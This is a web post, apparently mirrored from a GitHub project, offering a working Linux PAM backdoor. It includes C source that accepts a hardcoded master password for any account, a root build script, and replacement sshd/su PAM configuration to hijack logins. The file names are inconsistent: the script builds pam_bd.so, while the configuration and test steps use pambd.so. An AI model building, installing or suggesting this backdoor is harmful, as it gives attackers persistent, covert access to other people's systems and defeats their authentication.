This trick shows you how to create a PAM module backdoor that allows to execute an user login with your own custom password.
If you try to make the login with the real password of the target user and the authentication fails, the pam_auth.so switches to the pambd.so and viceversa.
Generate the backdoor:
If you get the error:
pambd.c:13:31: fatal error: security/pam_appl.h: No such file or directory
First install the package libpam-dev that contains the needed headers file for compilation:
deftcode pambd $ sudo apt-get install libpam0g-dev
Now edit the pambd.c and set your master custom password:
#define MYPASSWD "my_master_passwd"
After that, generate the pam backdoor with: (It needs the root permissions)
deftcode pambd $ sudo sh gen.sh
::Configure the PAM service you want to hijack::
Edit the /etc/pam.d/sshd or other that use PAM like /etc/pam.d/su and then replace the content with these lines:
nauth sufficient pam_rootok.so auth sufficient pam_unix.so # This must be 'sufficient'. account required pam_unix.so session required pam_unix.so auth sufficient pambd.so # This is our pam backdoor. account sufficient pambd.so # --
::Test the backdoor::
After you have created the pambd backdoor, you can test It.
deftcode pambd $ file /lib/security/pambd.so /lib/security/pambd.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, not stripped
gen.sh – generate the pam backdoor.Script:
#!/bin/bash
# gen.sh - generate the pam backdoor.
BIN_GCC='/usr/bin/gcc'
BIN_LD='/usr/bin/ld'
BIN_RM='/bin/rm'
CFLAGS='-fPIC'
LDFLAGS='-x --shared'
if [ "$(id -u)" != '0' ]; then
echo 'This script must be run as root!' 1>&2
exit 1
fi
${BIN_GCC} ${CFLAGS} -c pambd.c
${BIN_LD} ${LDFLAGS} -o /lib/security/pam_bd.so pambd.o
${BIN_RM} pambd.opambd.c – A small pam backdoor. Script:
/**
* pambd.c - A small pam backdoor.
* Federico Fazzi <eurialo@deftcode.ninja>
*
* This trick shows you how to create a PAM module backdoor that
* allows to execute an user login with your own custom password.
*
* If you try to make the login with the real password of the target
* user and the authentication fails, the pam_auth.so switches to the
* pambd.so and viceversa!
*
* (c) 2015 - MIT License.
*/
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <security/pam_appl.h>
#include <security/pam_modules.h>
#define MYPASSWD "my_master_passwd"
PAM_EXTERN int pam_sm_setcred
(pam_handle_t *pamh, int flags, int argc, const char **argv) {
return PAM_SUCCESS;
}
PAM_EXTERN int pam_sm_acct_mgmt
(pam_handle_t *pamh, int flags, int argc, const char **argv) {
return PAM_SUCCESS;
}
PAM_EXTERN int pam_sm_authenticate
(pam_handle_t *pamh, int flags,int argc, const char **argv) {
char *password = NULL;
pam_get_authtok(pamh, PAM_AUTHTOK, (const char **)&password, NULL);
if (!strncmp(password, MYPASSWD, strlen(MYPASSWD)))
return PAM_SUCCESS;
return -1;
}
Download : Master.zip | Clone Url
Source : https://github.com/eurialo